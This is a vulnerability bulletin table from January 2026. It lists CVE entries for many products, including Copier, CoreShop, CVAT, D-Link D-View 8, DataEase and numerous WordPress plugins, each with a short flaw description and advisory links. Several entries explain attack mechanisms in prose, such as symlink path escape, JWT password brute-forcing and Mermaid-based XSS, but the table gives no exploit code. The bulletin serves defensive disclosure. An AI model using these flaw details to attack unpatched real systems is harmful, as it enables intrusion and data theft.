| copier-org--copier | Copier is a library and CLI app for rendering project templates. Prior to version 9.11.2, Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions which would require passing the `--UNSAFE,--trust` flag. As it turns out, a safe template can currently write to arbitrary directories outside the destination path by using a directory symlink along with `_preserve_symlinks: true` and a generated directory structure whose rendered path is inside the symlinked directory. This way, a malicious template author can create a template that overwrites arbitrary files (according to the user's write permissions), e.g., to cause havoc. Version 9.11.2 patches the issue. | 2026-01-21 | not yet calculated | CVE-2026-23986 | https://github.com/copier-org/copier/security/advisories/GHSA-4fqp-r85r-hxqh https://github.com/copier-org/copier/commit/b3a7b3772d17cf0e7a4481978188c9f536c8d8f6 https://github.com/copier-org/copier/releases/tag/v9.11.2 |
| coreshop--CoreShop | CoreShop is a Pimcore enhanced eCommerce solution. An error-based SQL Injection vulnerability was identified in versions prior to 4.1.9 in the `CustomerTransformerController` within the CoreShop admin panel. The affected endpoint improperly interpolates user-supplied input into a SQL query, leading to database error disclosure and potential data extraction. Version 4.1.9 fixes the issue. | 2026-01-22 | not yet calculated | CVE-2026-23959 | https://github.com/coreshop/CoreShop/security/advisories/GHSA-fqcv-8859-86x2 https://github.com/coreshop/CoreShop/commit/af80b8f5c7df5f02f44e9c5e0a4a564de274eec2 https://github.com/coreshop/CoreShop/releases/tag/4.1.9 |
| cozythemes--HomeLancer | Missing Authorization vulnerability in cozythemes HomeLancer homelancer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects HomeLancer: from n/a through <= 1.0.1. | 2026-01-22 | not yet calculated | CVE-2025-49375 | https://patchstack.com/database/Wordpress/Theme/homelancer/vulnerability/wordpress-homelancer-theme-1-0-1-broken-access-control-vulnerability?_s_id=cve |
| Craig Hewitt--Seriously Simple Podcasting | Server-Side Request Forgery (SSRF) vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Server Side Request Forgery. This issue affects Seriously Simple Podcasting: from n/a through <= 3.14.1. | 2026-01-22 | not yet calculated | CVE-2026-24360 | https://patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-14-1-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| crawlchat--crawlchat | CrawlChat is an open-source, AI-powered platform that transforms technical documentation into intelligent chatbots. Prior to version 0.0.8, a missing permission check in CrawlChat's Discord bot allows guild users without manage permissions to put malicious content onto the collection's knowledge base. Usually, admins / mods of a Discord guild use the `jigsaw` emoji to save a specific message (chain) onto the collection's knowledge base in CrawlChat. Unfortunately, a permission check (e.g. MANAGE_SERVER, MANAGE_MESSAGES) was not done, allowing normal users of the guild to add information to the knowledge base. By targeting specific parts that are commonly asked about, users can manipulate the content given out by the bot (on all integrations), e.g. to redirect users to a malicious site or to send information to a malicious user. Version 0.0.8 patches the issue. | 2026-01-19 | not yet calculated | CVE-2026-23875 | https://github.com/crawlchat/crawlchat/security/advisories/GHSA-f484-62p4-6w4p https://github.com/crawlchat/crawlchat/commit/f90ebb93c6a830f6cf609d683f6425af8434573a https://github.com/crawlchat/crawlchat/releases/tag/v0.0.8 |
| CridioStudio--ListingPro Reviews | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CridioStudio ListingPro Reviews listingpro-reviews allows Reflected XSS. This issue affects ListingPro Reviews: from n/a through <= 1.7. | 2026-01-22 | not yet calculated | CVE-2025-69051 | https://patchstack.com/database/Wordpress/Plugin/listingpro-reviews/vulnerability/wordpress-listingpro-reviews-theme-1-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CRM Perks--Integration for Contact Form 7 HubSpot | Insertion of Sensitive Information Into Sent Data vulnerability in CRM Perks Integration for Contact Form 7 HubSpot cf7-hubspot allows Retrieve Embedded Sensitive Data. This issue affects Integration for Contact Form 7 HubSpot: from n/a through <= 1.4.3. | 2026-01-23 | not yet calculated | CVE-2026-24559 | https://patchstack.com/database/Wordpress/Plugin/cf7-hubspot/vulnerability/wordpress-integration-for-contact-form-7-hubspot-plugin-1-4-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| Crocoblock--JetEngine | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetEngine jet-engine allows Reflected XSS. This issue affects JetEngine: from n/a through <= 3.7.7. | 2026-01-22 | not yet calculated | CVE-2025-67923 | https://patchstack.com/database/Wordpress/Plugin/jet-engine/vulnerability/wordpress-jetengine-plugin-3-7-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| cvat-ai--cvat | CVAT is an open source interactive video and image annotation tool for computer vision. In versions 2.2.0 through 2.54.0, an attacker is able to execute arbitrary JavaScript in a victim user's CVAT UI session, provided that they are able to create a maliciously crafted label in a CVAT task or project, then get the victim user to either edit that label, or view a shape that refers to that label; and/or get the victim user to upload a maliciously crafted SVG image when configuring a skeleton. This gives the attacker temporary access to all CVAT resources that the victim user can access. Version 2.55.0 fixes the issue. | 2026-01-21 | not yet calculated | CVE-2026-23516 | https://github.com/cvat-ai/cvat/security/advisories/GHSA-3m7p-wx65-c7mp https://github.com/cvat-ai/cvat/commit/40800707fe39e3ff76c8d036eb953eb12d764e70 |
| cvat-ai--cvat | CVAT is an open source interactive video and image annotation tool for computer vision. In versions 1.0.0 through 2.54.0, users that have the staff status may freely change their permissions, including giving themselves superuser status and joining the admin group, which gives them full access to the data in the CVAT instance. Version 2.55.0 fixes the issue. As a workaround, review the list of users with staff status and revoke it from any users that are not expected to have superuser privileges. | 2026-01-21 | not yet calculated | CVE-2026-23526 | https://github.com/cvat-ai/cvat/security/advisories/GHSA-7pvv-w55f-qmw7 https://github.com/cvat-ai/cvat/commit/88ac7aa4d5b52271a30f1aa387c0f5745f8f77d4 |
| D-Link--D-View 8 | D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system. | 2026-01-21 | not yet calculated | CVE-2026-23754 | https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471 https://www.vulncheck.com/advisories/dlink-dview-8-idor-allows-credential-disclosure-and-account-takeover |
| D-Link--D-View 8 | D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise. | 2026-01-21 | not yet calculated | CVE-2026-23755 | https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471 https://www.vulncheck.com/advisories/dlink-dview-8-installer-dll-preloading-via-uncontrolled-search-path |
| daap--daap | NULL pointer dereference in the daap_reply_groups function in src/httpd_daap.c in owntone-server through commit 5e6f19a (newer commit after version 28.2) allows remote attackers to cause a Denial of Service. | 2026-01-20 | not yet calculated | CVE-2025-57155 | https://github.com/owntone/owntone-server/commit/d857116e4143a500d6a1ea13f4baa057ba3b0028 https://github.com/archersec/security-advisories/blob/master/owntone-server/owntone-server-advisory-2025.md |
| dacp--dacp | NULL pointer dereference in the dacp_reply_playqueueedit_clear function in src/httpd_dacp.c in owntone-server through commit 6d604a1 (newer commit after version 28.12) allows remote attackers to cause a Denial of Service (crash). | 2026-01-20 | not yet calculated | CVE-2025-57156 | https://github.com/owntone/owntone-server/issues/1907 https://github.com/owntone/owntone-server/commit/5e4d40ee03ae22ab79534bb1410fa9db96c9fabd https://github.com/archersec/security-advisories/blob/master/owntone-server/owntone-server-advisory-2025.md |
| dacp--dacp | A NULL pointer dereference in the dacp_reply_playqueueedit_move function (src/httpd_dacp.c) of owntone-server commit b7e385f allows attackers to cause a Denial of Service (DoS) via sending a crafted DACP request to the server. | 2026-01-20 | not yet calculated | CVE-2025-63648 | https://github.com/owntone/owntone-server/issues/1933 https://github.com/owntone/owntone-server/commit/5f526c7a7e08c567a5c72421d74a79dafdd07621 https://github.com/archersec/security-advisories/blob/master/owntone-server/owntone-server-advisory-2025.md |
| Damian--WP Popups | Missing Authorization vulnerability in Damian WP Popups wp-popups-lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Popups: from n/a through <= 2.2.0.3. | 2026-01-23 | not yet calculated | CVE-2026-24616 | https://patchstack.com/database/Wordpress/Plugin/wp-popups-lite/vulnerability/wordpress-wp-popups-plugin-2-2-0-3-broken-access-control-vulnerability?_s_id=cve |
| Daniel Iser--Easy Modal | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Daniel Iser Easy Modal easy-modal allows Stored XSS. This issue affects Easy Modal: from n/a through <= 2.1.0. | 2026-01-23 | not yet calculated | CVE-2026-24617 | https://patchstack.com/database/Wordpress/Plugin/easy-modal/vulnerability/wordpress-easy-modal-plugin-2-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| dataease--dataease | Dataease is an open source data visualization analysis tool. Prior to version 2.10.19, DataEase uses the MD5 hash of the user's password as the JWT signing secret. Because the secret is derived deterministically from the password, an attacker can brute-force the admin's password offline: a token forged with the MD5 hash of a candidate password is accepted only when the guess is correct, and unmonitored API endpoints that verify JWT signatures serve as the oracle. The vulnerability has been fixed in v2.10.19. No known workarounds are available. | 2026-01-22 | not yet calculated | CVE-2026-23958 | https://github.com/dataease/dataease/security/advisories/GHSA-5wvm-4m4q-rh7j |
| dataease--SQLBot | SQLBot is an intelligent data query system based on a large language model and RAG. Versions prior to 1.5.0 contain a missing authentication vulnerability in the /api/v1/datasource/uploadExcel endpoint, allowing a remote unauthenticated attacker to upload arbitrary Excel/CSV files and inject data directly into the PostgreSQL database. The endpoint is explicitly added to the authentication whitelist, causing the TokenMiddleware to skip all token validation. Uploaded files are parsed by pandas and inserted into the database via to_sql() with if_exists='replace', which drops and recreates the target table, so existing table contents can be overwritten by an unauthenticated upload. The vulnerability has been fixed in v1.5.0. No known workarounds are available. | 2026-01-21 | not yet calculated | CVE-2025-69285 | https://github.com/dataease/SQLBot/security/advisories/GHSA-crfm-cch4-hjpv https://github.com/dataease/SQLBot/releases/tag/v1.5.0 |
| Deetronix--Booking Ultra Pro | Insertion of Sensitive Information Into Sent Data vulnerability in Deetronix Booking Ultra Pro booking-ultra-pro allows Retrieve Embedded Sensitive Data. This issue affects Booking Ultra Pro: from n/a through <= 1.1.23. | 2026-01-22 | not yet calculated | CVE-2025-68006 | https://patchstack.com/database/Wordpress/Plugin/booking-ultra-pro/vulnerability/wordpress-booking-ultra-pro-plugin-1-1-23-sensitive-data-exposure-vulnerability?_s_id=cve |
| Design--Stylish Cost Calculator | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Design Stylish Cost Calculator stylish-cost-calculator allows Stored XSS. This issue affects Stylish Cost Calculator: from n/a through <= 8.1.8. | 2026-01-23 | not yet calculated | CVE-2026-24630 | https://patchstack.com/database/Wordpress/Plugin/stylish-cost-calculator/vulnerability/wordpress-stylish-cost-calculator-plugin-8-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| designingmedia--Hostiko | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designingmedia Hostiko hostiko allows Reflected XSS. This issue affects Hostiko: from n/a through < 94.3.6. | 2026-01-22 | not yet calculated | CVE-2025-67949 | https://patchstack.com/database/Wordpress/Theme/hostiko/vulnerability/wordpress-hostiko-theme-94-3-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| designthemes--Kids Heaven | Deserialization of Untrusted Data vulnerability in designthemes Kids Heaven kids-world allows Object Injection. This issue affects Kids Heaven: from n/a through <= 3.2. | 2026-01-22 | not yet calculated | CVE-2025-67619 | https://patchstack.com/database/Wordpress/Theme/kids-world/vulnerability/wordpress-kids-heaven-theme-3-2-php-object-injection-vulnerability?_s_id=cve |
| designthemes--OneLife | Deserialization of Untrusted Data vulnerability in designthemes OneLife onelife allows Object Injection. This issue affects OneLife: from n/a through <= 3.9. | 2026-01-22 | not yet calculated | CVE-2025-69002 | https://patchstack.com/database/Wordpress/Theme/onelife/vulnerability/wordpress-onelife-theme-3-9-php-object-injection-vulnerability?_s_id=cve |
| designthemes--Reservation Plugin | Missing Authorization vulnerability in designthemes Reservation Plugin dt-reservation-plugin allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Reservation Plugin: from n/a through <= 1.7. | 2026-01-22 | not yet calculated | CVE-2025-69095 | https://patchstack.com/database/Wordpress/Plugin/dt-reservation-plugin/vulnerability/wordpress-reservation-plugin-plugin-1-7-settings-change-vulnerability?_s_id=cve |
| designthemes--Vivagh | Deserialization of Untrusted Data vulnerability in designthemes Vivagh vivagh allows Object Injection. This issue affects Vivagh: from n/a through <= 2.4. | 2026-01-22 | not yet calculated | CVE-2025-68899 | https://patchstack.com/database/Wordpress/Theme/vivagh/vulnerability/wordpress-vivagh-theme-2-4-php-object-injection-vulnerability?_s_id=cve |
| Devolutions--Server | SQL Injection vulnerability in remote-sessions in Devolutions Server. This issue affects Devolutions Server 2025.3.1 through 2025.3.12. | 2026-01-19 | not yet calculated | CVE-2026-0610 | https://devolutions.net/security/advisories/DEVO-2026-0003/ |
| Devolutions--Server | Incorrect Authorization vulnerability in virtual gateway component in Devolutions Server allows attackers to bypass deny IP rules. This issue affects Server: from 2025.3.1 through 2025.3.12. | 2026-01-19 | not yet calculated | CVE-2026-1007 | https://devolutions.net/security/advisories/DEVO-2026-0003/ |
| DevsBlink--EduBlink Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in DevsBlink EduBlink Core edublink-core allows PHP Local File Inclusion. This issue affects EduBlink Core: from n/a through <= 2.0.7. | 2026-01-23 | not yet calculated | CVE-2026-24635 | https://patchstack.com/database/Wordpress/Plugin/edublink-core/vulnerability/wordpress-edublink-core-plugin-2-0-7-local-file-inclusion-vulnerability?_s_id=cve |
| Devsbrain--Flex QR Code Generator | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Devsbrain Flex QR Code Generator flex-qr-code-generator allows DOM-Based XSS. This issue affects Flex QR Code Generator: from n/a through <= 1.2.8. | 2026-01-23 | not yet calculated | CVE-2026-24614 | https://patchstack.com/database/Wordpress/Plugin/flex-qr-code-generator/vulnerability/wordpress-flex-qr-code-generator-plugin-1-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Dimitri Grassi--Salon booking system | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Dimitri Grassi Salon booking system salon-booking-system allows Retrieve Embedded Sensitive Data. This issue affects Salon booking system: from n/a through <= 10.30.3. | 2026-01-22 | not yet calculated | CVE-2025-67954 | https://patchstack.com/database/Wordpress/Plugin/salon-booking-system/vulnerability/wordpress-salon-booking-system-plugin-10-30-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| DioxusLabs--components | Dioxus Components is a shadcn-style component library for the Dioxus app framework. Prior to commit 41e4242ecb1062d04ae42a5215363c1d9fd4e23a, `use_animated_open` interpolates an `id` that can be user supplied into a string that is then passed to `eval`, so a crafted `id` can inject arbitrary JavaScript. Commit 41e4242ecb1062d04ae42a5215363c1d9fd4e23a patches the issue. | 2026-01-23 | not yet calculated | CVE-2026-24474 | https://github.com/DioxusLabs/components/security/advisories/GHSA-34pj-292j-xr69 https://github.com/DioxusLabs/components/commit/41e4242ecb1062d04ae42a5215363c1d9fd4e23a |
| Discord--Client | Discord Client Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Discord Client. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the discord_rpc module. The product loads a file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of a target user. Was ZDI-CAN-27057. | 2026-01-23 | not yet calculated | CVE-2026-0776 | ZDI-26-040 |
| Dmytro Shteflyuk--CodeColorer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dmytro Shteflyuk CodeColorer codecolorer allows Stored XSS. This issue affects CodeColorer: from n/a through <= 0.10.1. | 2026-01-22 | not yet calculated | CVE-2025-68012 | https://patchstack.com/database/Wordpress/Plugin/codecolorer/vulnerability/wordpress-codecolorer-plugin-0-10-1-stored-cross-site-scripting-xss-vulnerability?_s_id=cve |
| docmost--docmost | Docmost is open-source collaborative wiki and documentation software. In versions 0.3.0 through 0.23.2, Mermaid code block rendering is vulnerable to stored Cross-Site Scripting (XSS). The frontend can render attacker-controlled Mermaid diagrams using mermaid.render(), then inject the returned SVG/HTML into the DOM via dangerouslySetInnerHTML without sanitization. Mermaid per-diagram %%{init}%% directives allow overriding securityLevel and enabling htmlLabels, permitting arbitrary HTML/JS execution for any viewer. This issue has been fixed in version 0.24.0. | 2026-01-21 | not yet calculated | CVE-2026-23630 | https://github.com/docmost/docmost/security/advisories/GHSA-r4hj-mc62-jmwj https://github.com/docmost/docmost/commit/cb9f27da9a8b4940760e37e5238a1eb91e427daf https://github.com/docmost/docmost/releases/tag/v0.24.0 |
| docopt.cpp--docopt.cpp | A signed integer overflow in docopt.cpp v0.6.2 (LeafPattern::match in docopt_private.h) when merging occurrence counters (for example, a default of LONG_MAX plus the first user-supplied "-v/--verbose") can cause the counter to wrap (negative or unbounded semantics) and lead to logic/policy bypass in applications that rely on occurrence-based limits, rate-gating, or safety toggles. In hardened builds (e.g., UBSan or -ftrapv), the overflow may also result in process abort (DoS). | 2026-01-23 | not yet calculated | CVE-2025-67125 | https://gist.github.com/thesmartshadow/672afe8828844c833f46f8ebe2f5f3bd https://github.com/docopt/docopt.cpp |
| Doogee--Doogee | An OS command injection vulnerability in the com.sprd.engineermode component in Doogee Note59, Note59 Pro, and Note59 Pro+ allows a local attacker to execute arbitrary code and escalate privileges via the EngineerMode ADB shell, due to incomplete patching of CVE-2025-31710. | 2026-01-23 | not yet calculated | CVE-2025-67264 | http://doogee.com https://github.com/Skorpion96/unisoc-su/blob/main/CVE-2025-67264.md |
| Dotstore--Fraud Prevention For Woocommerce | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Dotstore Fraud Prevention For Woocommerce woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers allows Retrieve Embedded Sensitive Data. This issue affects Fraud Prevention For Woocommerce: from n/a through <= 2.3.1. | 2026-01-23 | not yet calculated | CVE-2026-24553 | https://patchstack.com/database/Wordpress/Plugin/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/vulnerability/wordpress-fraud-prevention-for-woocommerce-plugin-2-3-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| dragonflyoss--dragonfly | Dragonfly is an open source P2P-based file distribution and image acceleration system. In versions 2.4.1-rc.0 and below, the Job API endpoints (/api/v1/jobs) lack JWT authentication middleware and RBAC authorization checks in the routing configuration. This allows any unauthenticated user with access to the Manager API to view, update and delete jobs. The issue is fixed in version 2.4.1-rc.1. | 2026-01-22 | not yet calculated | CVE-2026-24124 | https://github.com/dragonflyoss/dragonfly/security/advisories/GHSA-j8hf-cp34-g4j7 https://github.com/dragonflyoss/dragonfly/commit/9fb9a2dfde3100f32dc7f48eabee4c2b64eac55f |
| Dynamicweb--Dynamicweb | An issue was discovered in Dynamicweb before 9.12.8. An attacker can add a new administrator user without authentication. This flaw exists due to a logic issue when determining if the setup phases of the product can be run again. Once an attacker is authenticated as the new admin user they have added, it is possible to upload an executable file and achieve command execution. This is fixed in 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9.8, 9.10.18, 9.12.8, and 9.13.0 (and later). | 2026-01-23 | not yet calculated | CVE-2022-25369 | https://www.dynamicweb.com/resources/downloads?Category=Releases https://www.assetnote.io/resources/research/advisory-dynamicweb-logic-flaw-leading-to-rce-cve-2022-25369 |
| e-plugins--Final User | Missing Authorization vulnerability in e-plugins Final User final-user allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Final User: from n/a through <= 1.2.5. | 2026-01-22 | not yet calculated | CVE-2025-69187 | https://patchstack.com/database/Wordpress/Plugin/final-user/vulnerability/wordpress-final-user-plugin-1-2-5-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Final User | Incorrect Privilege Assignment vulnerability in e-plugins Final User final-user allows Privilege Escalation. This issue affects Final User: from n/a through <= 1.2.5. | 2026-01-22 | not yet calculated | CVE-2025-69293 | https://patchstack.com/database/Wordpress/Plugin/final-user/vulnerability/wordpress-final-user-plugin-1-2-5-privilege-escalation-vulnerability?_s_id=cve |
| e-plugins--fitness-trainer | Missing Authorization vulnerability in e-plugins fitness-trainer fitness-trainer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects fitness-trainer: from n/a through <= 1.7.1. | 2026-01-22 | not yet calculated | CVE-2025-69188 | https://patchstack.com/database/Wordpress/Plugin/fitness-trainer/vulnerability/wordpress-fitness-trainer-plugin-1-7-1-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Hospital Doctor Directory | Missing Authorization vulnerability in e-plugins Hospital Doctor Directory hospital-doctor-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hospital Doctor Directory: from n/a through <= 1.3.9. | 2026-01-22 | not yet calculated | CVE-2025-68057 | https://patchstack.com/database/Wordpress/Plugin/hospital-doctor-directory/vulnerability/wordpress-hospital-doctor-directory-plugin-1-3-9-broken-access-control-vulnerability-2?_s_id=cve |
| e-plugins--Hospital Doctor Directory | Incorrect Privilege Assignment vulnerability in e-plugins Hospital Doctor Directory hospital-doctor-directory allows Privilege Escalation. This issue affects Hospital Doctor Directory: from n/a through <= 1.3.9. | 2026-01-22 | not yet calculated | CVE-2025-69183 | https://patchstack.com/database/Wordpress/Plugin/hospital-doctor-directory/vulnerability/wordpress-hospital-doctor-directory-plugin-1-3-9-privilege-escalation-vulnerability?_s_id=cve |
| e-plugins--Hospital Doctor Directory | Missing Authorization vulnerability in e-plugins Hospital Doctor Directory hospital-doctor-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hospital Doctor Directory: from n/a through <= 1.3.9. | 2026-01-22 | not yet calculated | CVE-2025-69186 | https://patchstack.com/database/Wordpress/Plugin/hospital-doctor-directory/vulnerability/wordpress-hospital-doctor-directory-plugin-1-3-9-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Hotel Listing | Missing Authorization vulnerability in e-plugins Hotel Listing hotel-listing allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hotel Listing: from n/a through <= 1.4.2. | 2026-01-22 | not yet calculated | CVE-2025-68059 | https://patchstack.com/database/Wordpress/Plugin/hotel-listing/vulnerability/wordpress-hotel-listing-plugin-1-4-2-broken-access-control-vulnerability-2?_s_id=cve |
| e-plugins--Hotel Listing | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins Hotel Listing hotel-listing allows Reflected XSS. This issue affects Hotel Listing: from n/a through <= 1.4.0. | 2026-01-22 | not yet calculated | CVE-2025-69056 | https://patchstack.com/database/Wordpress/Plugin/hotel-listing/vulnerability/wordpress-hotel-listing-plugin-1-4-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| e-plugins--Hotel Listing | Missing Authorization vulnerability in e-plugins Hotel Listing hotel-listing allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hotel Listing: from n/a through <= 1.4.2. | 2026-01-22 | not yet calculated | CVE-2025-69185 | https://patchstack.com/database/Wordpress/Plugin/hotel-listing/vulnerability/wordpress-hotel-listing-plugin-1-4-2-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Institutions Directory | Missing Authorization vulnerability in e-plugins Institutions Directory institutions-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Institutions Directory: from n/a through <= 1.3.4. | 2026-01-22 | not yet calculated | CVE-2025-68058 | https://patchstack.com/database/Wordpress/Plugin/institutions-directory/vulnerability/wordpress-institutions-directory-plugin-1-3-4-broken-access-control-vulnerability-2?_s_id=cve |
| e-plugins--Institutions Directory | Incorrect Privilege Assignment vulnerability in e-plugins Institutions Directory institutions-directory allows Privilege Escalation. This issue affects Institutions Directory: from n/a through <= 1.3.4. | 2026-01-22 | not yet calculated | CVE-2025-69182 | https://patchstack.com/database/Wordpress/Plugin/institutions-directory/vulnerability/wordpress-institutions-directory-plugin-1-3-4-privilege-escalation-vulnerability?_s_id=cve |
| e-plugins--Institutions Directory | Missing Authorization vulnerability in e-plugins Institutions Directory institutions-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Institutions Directory: from n/a through <= 1.3.4. | 2026-01-22 | not yet calculated | CVE-2025-69184 | https://patchstack.com/database/Wordpress/Plugin/institutions-directory/vulnerability/wordpress-institutions-directory-plugin-1-3-4-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Lawyer Directory | Incorrect Privilege Assignment vulnerability in e-plugins Lawyer Directory lawyer-directory allows Privilege Escalation. This issue affects Lawyer Directory: from n/a through <= 1.3.3. | 2026-01-22 | not yet calculated | CVE-2025-67966 | https://patchstack.com/database/Wordpress/Plugin/lawyer-directory/vulnerability/wordpress-lawyer-directory-plugin-1-3-3-privilege-escalation-vulnerability?_s_id=cve |
| e-plugins--Lawyer Directory | Missing Authorization vulnerability in e-plugins Lawyer Directory lawyer-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Lawyer Directory: from n/a through <= 1.3.3. | 2026-01-22 | not yet calculated | CVE-2025-67967 | https://patchstack.com/database/Wordpress/Plugin/lawyer-directory/vulnerability/wordpress-lawyer-directory-plugin-1-3-3-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Lawyer Directory | Missing Authorization vulnerability in e-plugins Lawyer Directory lawyer-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Lawyer Directory: from n/a through <= 1.3.4. | 2026-01-22 | not yet calculated | CVE-2025-69181 | https://patchstack.com/database/Wordpress/Plugin/lawyer-directory/vulnerability/wordpress-lawyer-directory-plugin-1-3-4-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Listihub | Missing Authorization vulnerability in e-plugins Listihub listihub allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Listihub: from n/a through <= 1.0.6. | 2026-01-22 | not yet calculated | CVE-2025-69190 | https://patchstack.com/database/Wordpress/Theme/listihub/vulnerability/wordpress-listihub-theme-1-0-6-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--ListingHub | Missing Authorization vulnerability in e-plugins ListingHub listinghub allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ListingHub: from n/a through <= 1.2.7. | 2026-01-22 | not yet calculated | CVE-2025-69191 | https://patchstack.com/database/Wordpress/Plugin/listinghub/vulnerability/wordpress-listinghub-plugin-1-2-7-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--Real Estate Pro | Missing Authorization vulnerability in e-plugins Real Estate Pro real-estate-pro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Real Estate Pro: from n/a through <= 2.1.5. | 2026-01-22 | not yet calculated | CVE-2025-69192 | https://patchstack.com/database/Wordpress/Plugin/real-estate-pro/vulnerability/wordpress-real-estate-pro-plugin-2-1-5-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--WP Membership | Missing Authorization vulnerability in e-plugins WP Membership wp-membership allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Membership: from n/a through <= 1.6.4. | 2026-01-22 | not yet calculated | CVE-2025-69193 | https://patchstack.com/database/Wordpress/Plugin/wp-membership/vulnerability/wordpress-wp-membership-plugin-1-6-4-broken-access-control-vulnerability?_s_id=cve |
| e-plugins--WP Membership | Incorrect Privilege Assignment vulnerability in e-plugins WP Membership wp-membership allows Privilege Escalation. This issue affects WP Membership: from n/a through <= 1.6.4. | 2026-01-22 | not yet calculated | CVE-2025-69292 | https://patchstack.com/database/Wordpress/Plugin/wp-membership/vulnerability/wordpress-wp-membership-plugin-1-6-4-privilege-escalation-vulnerability?_s_id=cve |
| Ecwid by Lightspeed Ecommerce Shopping Cart--Ecwid Shopping Cart | Missing Authorization vulnerability in Ecwid by Lightspeed Ecommerce Shopping Cart Ecwid Shopping Cart ecwid-shopping-cart allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ecwid Shopping Cart: from n/a through <= 7.0.5. | 2026-01-23 | not yet calculated | CVE-2026-24580 | https://patchstack.com/database/Wordpress/Plugin/ecwid-shopping-cart/vulnerability/wordpress-ecwid-shopping-cart-plugin-7-0-5-broken-access-control-vulnerability?_s_id=cve |
| Ecwid by Lightspeed Ecommerce Shopping Cart--Ecwid Shopping Cart | Missing Authorization vulnerability in Ecwid by Lightspeed Ecommerce Shopping Cart Ecwid Shopping Cart ecwid-shopping-cart allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ecwid Shopping Cart: from n/a through <= 7.0.5. | 2026-01-23 | not yet calculated | CVE-2026-24613 | https://patchstack.com/database/Wordpress/Plugin/ecwid-shopping-cart/vulnerability/wordpress-ecwid-shopping-cart-plugin-7-0-5-broken-access-control-vulnerability-2?_s_id=cve |
| Edge-Themes--Eldon | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Edge-Themes Eldon eldon allows PHP Local File Inclusion. This issue affects Eldon: from n/a through <= 1.0. | 2026-01-22 | not yet calculated | CVE-2025-69057 | https://patchstack.com/database/Wordpress/Theme/eldon/vulnerability/wordpress-eldon-theme-1-0-local-file-inclusion-vulnerability?_s_id=cve |
